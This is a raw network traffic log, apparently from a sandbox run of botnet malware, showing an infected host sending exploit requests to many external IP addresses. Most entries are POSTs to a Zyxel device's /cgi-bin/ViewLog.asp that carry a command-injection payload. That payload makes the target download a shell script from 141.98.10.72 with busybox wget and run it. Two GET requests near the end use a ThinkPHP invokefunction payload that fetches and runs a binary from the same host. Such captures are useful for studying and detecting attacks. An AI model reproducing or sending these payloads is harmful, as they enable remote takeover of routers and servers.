                                                            Date: Wed, 14 Feb 2024 09:30:49 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=180, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            703192.168.2.235216285.75.151.2428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.245939016 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            704192.168.2.234103495.131.74.738080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.249176025 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.494930029 CET313INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 106
                                                            Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            705192.168.2.234195431.200.6.2038080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.250271082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            706192.168.2.234395894.121.130.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.252360106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            707192.168.2.235860894.127.207.2098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.270380020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.540756941 CET35INHTTP/1.0 302 Redirect


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            708192.168.2.234307431.136.37.818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.468441010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:35.158023119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:36.501876116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.253495932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.628818035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:55.379213095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.392153978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:00.394300938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            709192.168.2.233495295.0.153.1708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.488693953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.733233929 CET297INHTTP/1.1 302 Found
                                                            Location: /weblogin.htm
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Expires: -1
                                                            Pragma: no-cache
                                                            Content-Length: 0
                                                            Date: Wed, 14 Feb 2024 08:29:33 GMT
                                                            Server: Server
                                                            Feb 14, 2024 09:29:34.934811115 CET297INHTTP/1.1 302 Found
                                                            Location: /weblogin.htm
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Expires: -1
                                                            Pragma: no-cache
                                                            Content-Length: 0
                                                            Date: Wed, 14 Feb 2024 08:29:33 GMT
                                                            Server: Server


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            710192.168.2.234194694.122.70.1078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.511215925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            711192.168.2.234608262.29.37.178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.511276007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            712192.168.2.234057431.136.58.1338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.906996965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:35.542023897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:36.789942026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.253473043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.372868061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.355389118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.344400883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298810005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            713192.168.2.235537694.187.119.618080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:35.150998116 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            714192.168.2.234642694.120.244.2078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:35.152462006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            715192.168.2.235563262.60.210.1508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:35.188553095 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            716192.168.2.234197695.156.54.22880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:35.487452984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            717192.168.2.2349092112.173.228.22680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:36.022452116 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:36.306580067 CET506INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:29:35 GMT
                                                            Server: httpd
